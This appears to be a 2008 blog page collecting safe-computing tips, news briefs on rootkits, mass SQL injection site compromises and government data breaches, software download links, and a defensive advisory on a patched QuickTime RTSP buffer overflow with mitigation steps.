Healthly Computing Tips

January 2008

Computer viruses, computer worms and Trojan horses are malicious computer programs that are designed to copy and infect a computer without permission or knowledge of the user. These programs also known as malware can cause disruption to the operation and function of your computer and can range from simple annoyances such as pop-ups to major problems such as causing your computer to reboot, data hijacking or hard drive failure. The number, types and effects of malware increase daily, so protection from these programs is essential. And, as is the case with human health, prevention is the best cure.
How can you avoid problems? If you are running a Windows operating system, install (at minimum) windows critical updates. Most viruses attack a weakness or “holes” in the Windows operating system. After weaknesses are discovered, Microsoft issues a patch to close it. To install these patches, start Internet Explorer and click on Tools/ Windows Updates. Additionally, you may want to set your computer to install these updates automatically (see your computer manual, Microsoft help menu or visit Microsoft’s’ website).

Although peer-to-peer network sharing is extremely popular these days, avoid downloading from an unknown source. I suggest downloading shared files to an old machine. Scan them and then transfer to your computer system.

Purchase and install reliable Internet Security software. There are good free programs available, but most often than not they remain nearly incomprehensive. You may end up running three different programs which taxes your processing power. This program should comprehensively protect you from viruses, adware, spyware, malware, intrusion, phishing, and include a built in firewall. This helps you to avoid software conflicts. Be sure that it includes automatic definition updates for the life of the software license. Be careful of the websites you visit. Certain types of websites are known sources for infection.

Your passwords are the keys to your computers heart and soul so guard them with care.

Perform a comprehensive backup of your computer system daily. It is a good practice to schedule an automatic backup image of your system. There are advanced programs to do this for you, but you can use the backup feature built into your windows operating system. Look in the “All Programs /Accessories” menu and start the backup wizard. You can set this function to run while you sleep and save to an external hard drive-In doing this, if your computer ever becomes infected, all you have to do is restore the uninfected backup.

For the advanced users, try to use a router with a built-in firewall or request that your Internet Service Provider give you a router with firewall protection.

Thanks Shanitra X

Stakeholders gear up for e-Crime Congress 2008

January 2008

Over 500 delegates from global businesses, governments, and law enforcement agencies will meet in London in March at the e-Crime Congress 2008 to discuss cyber-threats and electronic crime. Identity theft and fraud continue to threaten security and consumer confidence, but last year saw an increasing number of attacks on the IT infrastructure of companies and governments. A senior architect at security firm MessageLabs told vnunet.com in a recent interview about a shadow economy in the underground world of hackers, which closely mimics traditional economic models.

The Internet is down -- now what?

January 2008

According to the recent Business Roundtable report, “Growing Business Dependence on the Internet — New Risks Require CEO Action,” there is a 10 to 20 percent chance of a “breakdown of the critical information infrastructure” in the next 10 years, brought on by “malicious code, coding error, natural disasters, [or] attacks by terrorists and other adversaries.” An Internet meltdown would result in reduced productivity and profits, falling stock prices, erosion of consumer spending and potentially a liquidity crisis, the report says. The organization based its conclusions on earlier risk analyses done by the World Economic Forum in Geneva. The director of public policy at The Business Roundtable, an association of CEOs from large U.S. companies, says business executives often fail to realize how dependent they have become on the public network — for e-mail, collaboration, e-commerce, public- facing and internal Web sites, and information retrieval by employees. He also notes that disaster recovery and business-continuity plans often fail to take into account the threat an Internet disruption poses to a company and its suppliers. Moreover, business executives often mistakenly believe that government will take the lead in restoring network services in the face of an Internet failure, he says. “What we wanted to do in this report is say to CEOs, ‘You may not realize that whole segments of your business are almost completely dependent on the Internet, and it’s not enough to have a few IT specialists to help you respond to problems as they come up.’”

Audio Video HTML Oh my......

January 2008

A list of links for mac or pc users to stream video, listen and record audio and html.

The Links:
For pc user playing Real Media Files: http://www.free-codecs.com/download/Real_Alternative.htm
Mac users can play files with regular Real Player 10

Audacity for recording sound for mac or pc users:
http://audacity.sourceforge.net/download/

Also download LAME it allows for the user to export the audio as a .mp3
http://lame.sourceforge.net/download.php

Update or Download the latest version of Quicktime and iTunes (pc or mac)
http://www.apple.com/quicktime/download/
(uncheck the boxes and don't enter email address)

And here is Wiretap:
http://www.ambrosiasw.com/utilities/wiretap/

And for html:
http://wordpress.org/download/

IRS information security still poor

January 2008

The Internal Revenue Service continues to have “pervasive” information security weaknesses that put taxpayer information at risk, and it has made limited progress in fixing dozens of problems the U.S. Government Accountability Office (GAO) has previously identified, according to a GAO report released Tuesday. The IRS, the tax-collecting arm of the U.S. government, has “persistent information security weaknesses that place [it] at risk of disruption, fraud or inappropriate disclosure of sensitive information,” the GAO report said. The agency, which collected about $2.7 trillion in taxes in 2007, has fixed just 29 of 98 information security weaknesses identified in a report released last March, the new report said. “Information security weaknesses -- both old and new -- continue to impair the agency’s ability to ensure the confidentiality, integrity and availability of financial and taxpayer information,” the GAO report said. “These deficiencies represent a material weakness in IRS’s internal controls over its financial and tax processing systems.” The GAO has issued multiple reports blasting IRS information security in recent years. The latest report described an IRS data center that took more than four months to install critical patches to server software. At one IRS data center, about 60 employees had access to commands that would allow them to make “significant” changes to the operating system, the GAO said. At two data centers, administrator access to a key application contained unencrypted data log-ins, potentially revealing users’ names and passwords. Three IRS sites visited by GAO auditors had computers or servers with poor password controls, the GAO said. The IRS also had lax physical security controls in place for protecting IT facilities, the GAO report said. One data center allowed at least 17 workers access to sensitive areas when their jobs did not require it, the GAO said. The IRS’s acting commissioner said the agency made significant progress in fixing information security problems during 2007, and in a letter to the GAO, said “While we agree that we have not yet fully implemented critical elements of our agency-wide information security program, the security and privacy of taxpayer information is of great concern to the IRS.”

Rootkit hides in HD's boot record...

January 2008

A rootkit that hides from Windows on the hard drive’s boot sector is infecting PCs, security researchers said today. Once installed, the cloaking software is undetectable by most current antivirus programs. The rootkit overwrites the hard drive’s master boot record (MBR), the first sector -- sector 0 -- where code is stored to bootstrap the operating system after the computer’s BIOS does its start-up checks. Because it hides on the MBR, the rootkit is effectively invisible to the operating system and security software installed on that operating system. “A traditional rootkit installs as a driver, just as when you install any hardware or software,” said the director of Symantec Corp.’s security response team. “Those drivers are loaded at or after the boot process. But this new rootkit installs itself before the operating system loads. It starts executing before the main operating system has a chance to execute.” Control the MBR, he continued, and you control the operating system, and thus the computer. According to other researchers, including those with the SANS Institute’s Internet Storm Center, Prevx Ltd., and a Polish analyst who uses the alias “gmer,” the rootkit has infected several thousand PCs since mid-December, and is used to cloak a follow-on bank account-stealing Trojan horse from detection, as well as to reinstall the identity thief if a security scanner somehow sniffs it out.

Hackers turn Cleveland into malware server...

January 2008

Tens of thousands of websites belonging to Fortune 500 corporations, state government agencies, and schools have been infected with malicious code that attempts to engage in click fraud and steal online game credentials from people who visit the destinations, security researches say. More than 94,000 URLs had been infected by the fast-moving exploit, which redirects users to the uc8010-dot-com domain. The security company Computer Associates was infected at one point, as were sites belonging to the state of Virginia, the city of Cleveland, and Boston University. Malicious hackers were able to breach the sites by exploiting un-patched SQL injection vulnerabilities that resided on the servers, according to the CTO for the SANS Internet Storm Center. The injections includedjava_script that redirected end users to the rogue site, which then attempted to exploit multiple vulnerabilities to install key-logging software that stole passwords for various online games. According to a researcher for ScanSafe, the exploits forced end users to visit sites that pay third parties a fee in exchange for sending them traffic. She speculates the attackers signed up as affiliates of the sites and then profited each time an end user was infected. The malware also installed keyloggers on end user machines that stole passwords to various online games, another researcher said. He added that the uc8010-dot-com domain was registered in late December using a Chinese-based registrar, indicating the attackers were fluent in Chinese.

Un-Hackable_L3t5 S33...

January 2008

‘Hacker safe’ Web site gets hit by hacker. On Friday, Geeks.com, a $150 million company specializing in the sale of computer-related excess inventory and manufacturers’ closeouts, began notifying an unspecified number of customers whose personal and financial data may have been compromised by an intrusion into the systems that run the online technology retailer’s Web site. The compromised information included the names, addresses, telephone numbers, and Visa credit card numbers of customers who had shopped at Geeks.com, according to a copy of the letter that was posted on The Consumerist blog. Its Web site prominently proclaims that it is tested on a daily basis by ScanAlert Inc., a vendor in Santa Clara, California, that agreed in October to be acquired by McAfee Inc. McAfee officials were not immediately available to comment on what might have happened at Geeks.com. A telephone operator at Geeks.com’s headquarters in Oceanside, California, said that she was unable to find anyone at the retailer who could comment about the incident. Last week’s notification included a number for non-U.S. residents to call, suggesting that the breach may have affected customers in other countries as well. According to a letter, which was signed by chief of security at Geeks.com, the intrusion has been reported to local law enforcement authorities, as well as to the U.S. Secret Service. The incident has also been reported to Visa without providing any indication of why only Visa card numbers appear to have been compromised.

U.S. government needs new cybersecurity, Nah!!!

January 2008

U.S. government agencies need to take additional steps to protect against cybersecurity problems after a series of congressional hearings and reports exposed several weaknesses in 2007, representatives of Symantec Corp. said. The government sector, including state and local governments, accounted for 26 percent of data breaches that could lead to identity theft in the first half of 2007, according to Symantec’s latest Government Internet Security Threat Report, published in September. The U.S. Government Accountability Office (GAO) also issued about a dozen reports in the last six months criticizing federal agencies for not fully implementing the GAO’s cybersecurity recommendations. While U.S. agencies have a set of cybersecurity rules set out in the Federal Information Security Management Act, agencies are not held accountable when they have breaches, said Symantec’s vice president for the public sector. Agencies do not lose funding from Congress after cybersecurity incidents, he said. Agencies can take more steps to fix problems, he added, such as to inventory IT assets, to develop comprehensive cybersecurity plans, do systematic vulnerability testing, have a data backup plan and back up frequently. There still seems to be interest from lawmakers in agency cybersecurity and breach notification, he said. The hearings and information requests from lawmakers are bringing to light multiple attacks and breaches at agencies, he said. “There’s no real mechanism requiring agencies to report breaches,” added Symantec’s federal government relations manager.

Mass Hacks...

January 2008

Mass hack infects tens of thousands of sites. Tens of thousands of Web sites have been compromised by an automated SQL injection attack, and, although some have been cleaned, others continue to serve visitors a malicious script that tries to hijack their PCs using multiple exploits, security experts said this weekend. The chief research officer of Grisoft SRO pointed out that the hacked sites could be found via a simple Google search for the domain that hosted the maliciousjava_script. On Saturday, he said, the number of sites that had fallen victim to the attack numbered more than 70,000. “This was a pretty good mass-hack,” he said in a blog post.

“It wasn’t just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared.” Symantec Corp. cited reports by other researchers that fingered a SQL vulnerability as the common thread. “The sites [were] hacked by hacking robot by means of a SQL injection attack, which executes an iterative SQL loop [that] finds every normal table in the database by looking in the sysobjects table and then appends every text column with the harmful script,” said one of the researchers. “It’s possible that only Microsoft SQL Server databases were hacked with this particular version of the robot since the script relies on the sysobjects table that this database contains.” According to the same researcher, the attack appends ajava_script tag to every piece of text in the SQL database; the tag instructs any browser that reaches the site to execute the script hosted on the malicious server. Hacked sites included both .edu and .gov domains, added SANS Institute’s Internet Storm Center (ISC) in a warning posted last Friday, while others flagged several pages of security vendor CA Inc.’s Web site as infected.

BREACH!!!

January 2008

Breaches plague government agencies. Two more major losses of private data have been reported by government agencies in the past few days, adding fuel to fiery criticism of federal and regional government’s privacy practices over recent weeks, both in the U.S. and overseas. A holiday break-in at the Davidson County Election Office in Tennessee resulted in the theft of two laptops containing personal information on all 337,000 voters in the region, according to reports. The data included full Social Security numbers for each voter, and at least one report indicated that the data was not encrypted. Meanwhile, more than 10,000 U.S. Air Force active and retired employees were informed Friday that a laptop containing their Social Security numbers, birth dates, addresses, and telephone numbers is missing, according to reports. The laptop belonged to an Air Force band member at Bolling Air Force Base in Washington, D.C., and was reported missing from his home. A stolen laptop containing personal information was also reported by the Minnesota Department of Commerce on Friday. The data losses by the regional and federal government agencies in the U.S. are fuel to the fire of criticism that has taken place in the U.K. over the past several weeks, as more details come to light about breaches in several British government agencies. Criminals may not even have to break in or steal data to get citizens’ personal information from government agencies, according to a report in yesterday’s Washington Post. The report notes that criminals can gather names, Social Security numbers, and other personal data simply by scanning through online public records and documents.

California opens office to fight ID theft...

January 2008

California’s governor opened a new office Wednesday to fight high-tech identity theft -- a move activists said will help, as firms fail to meet California’s landmark consumer privacy laws. The governor’s administration merged separate departments into the single California Office of Information Security and Privacy Protection, which officials said will be unique among states as it helps guide law enforcement, businesses, advocacy groups, and consumers. The governor, who signed legislation carrying out the merger, has convened two summits so far against identity theft, which experts say is escalating as the Internet opens up new opportunities for criminals. Government and business groups have vowed to work together more closely, while urging consumers to protect themselves against data theft with computer firewalls and other software programs that protect against online intrusions. The new agency combines the former Office of Privacy Protection in the Department of Consumer Affairs, which opened in 2001, with the state Information Security Office, formerly part of the Department of Finance. “This union will strengthen the efforts of both offices,” said the secretary of the State and Consumer Services Agency.

Sears & K-mart: Spooky Big Business...

January 2008

Researcher says Sears downloads spyware. Sears and Kmart customers who sign up for a new marketing program may be giving up more private information than they bargained for, a prominent anti-spyware researcher claims. According to a Harvard Business School Assistant Professor, Sears Holdings’ My SHC Community program falls short of Federal Trade Commission (FTC) standards by failing to notify users exactly what happens when they download the company’s marketing software. Given the invasive nature of the product, Sears has an obligation to make its behavior clearer to users. “The software is not something you’d want on your computer or the computer of anyone you care about,” the professor said in an interview. “It tracks every site you go to, every search you make, every product you buy, and every product you look at but don’t buy. It’s just spooky.”

Edit PDFs on a Mac...

January 2008

If you do not have Adobe Professional here is an alternative...

Fill out PDF forms and edit PDFs easily with PDFpen! Split, combine, reorder, sign and augment PDFs with text, image overlays & watermarks. Download PDFpen and try it now!

Use PDFpen with PageSender for a complete turnaround fax solution.

- Receive a fax form via PageSender
- Open it in PDFpen
- Fill it out with PDFpen & even scribble your signature
- Fax it right back via PageSender direct from PDFpen!

No printing or scanning necessary!

Need to merge pages from several PDF files together?
– Open the files in PDFpen and drag the pages you need from each into a new document

Need to sign that electronic fax?
– Open the fax in PDFpen and scribble your signature with the mouse or drag in a scan of it. Scale it to sign on the dotted line.

Need to cut a PDF document down to size?
– Open a copy in PDFpen, select the pages to remove, hit Delete, and save. It's that easy.
Need to repurpose PDF content?
– Now you can search, select and copy the text of PDF documents.

Need to apply custom serial numbers to your PDF documents?
– PDFpen is fully scriptable, so you can automate nearly anything you can do in the interface.

Apple's QuickTime...

January 2008

SUBJECT:
Apple QuickTime RTSP Response Header Remote Stack Based Buffer Overflow

ORIGINAL OVERVIEW:

A new vulnerability in Apple Quicktime is actively being exploited on the Internet. The vulnerability can be exploited if a user visits a malicious web site. If the vulnerability is successfully exploited, an attacker may be able to execute arbitrary code on a vulnerable system with the same rights of the logged-on user. This may allow the attacker to gain complete control of the affected system.

Note that there is currently no patch for this vulnerability.

UPDATED INFORMATION:
Apple released a patch that addresses the QuickTime RTSP vulnerability. This patch also addresses two other vulnerabilities; refer to the updated Description section below for additional technical details on these vulnerabilities. See the Reference sections below for patch download locations and additional information. We recommend that this patch be installed immediately on all affected systems after appropriate testing.

SYSTEMS AFFECTED:

Apple QuickTime Player 7.3 and earlier
RISK:
Government:

Large and medium government entities: High
Small government entities: High
ORIGINAL DESCRIPTION:

Apple Quicktime is a media player for the Mac OS X and Microsoft Windows operating systems.

A new vulnerability has been discovered in Quicktime that is currently being exploited on the Internet. Quicktime is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized stack-based memory buffer. The issue occurs when handling specially crafted Real Time Streaming Protocol (RTSP) response headers.

RTSP is a protocol used by Quicktime to stream media content over the internet. By default, the protocol runs over ports 554 tcp/udp and 6970-6999 udp. The protocol also runs over an alternative port of 8554 tcp/udp. However, the protocol can be configured to run over any port which allows for firewalls to be circumvented by hosting the malicious RTSP server on 80/tcp or another commonly unfiltered port.

This vulnerability can be exploited if a user visits a specially crafted web page that hosts the malicious content or opens a malicious e-mail attachment. The user would then have to view the content by clicking a link or having it load automatically within the web page. When the user views the content, the RTSP server would then send the exploit code designed to perform some action on the attacker’s behalf. A failed attack will likely cause denial-of-service conditions.

DECEMBER 14 UPDATED DESCRIPTION:

Apple released a patch that addresses the QuickTime RTSP vulnerability. In addition, the patch also fixes multiple vulnerabilities in QuickTime’s media handler and a heap overflow vulnerability caused by viewing a specially-crafted QTL file.

ORGINAL RECOMMENDATIONS:
We recommend the following actions be taken:

Set the kill bit on the Class Identifier (CLSID) {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} & {4063BE15-3B08-470D-A0D5-B37161CFFD69}; further instructions on how to set the kill bit can be found at the following location
( http://support.microsoft.com/kb/240797 )

Blocking the RTSP protocol with a proxy or firewall may help mitigate this vulnerability.
Blocking outbound access to ports 554 tcp/udp, 6970-6999 udp and, 8554 tcp/udp may partially mitigate this vulnerability. Since RTSP can be configured to use a variety or ports, blocking RTSP by port may not be sufficient.
Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.
Do not visit unknown or un-trusted Web sites or follow links provided by unknown or un-trusted sources.

UPDATED RECOMMENDATIONS:

Apply the appropriate patch to vulnerable systems immediately after appropriate testing. The patch is available at: http://www.apple.com/support/downloads/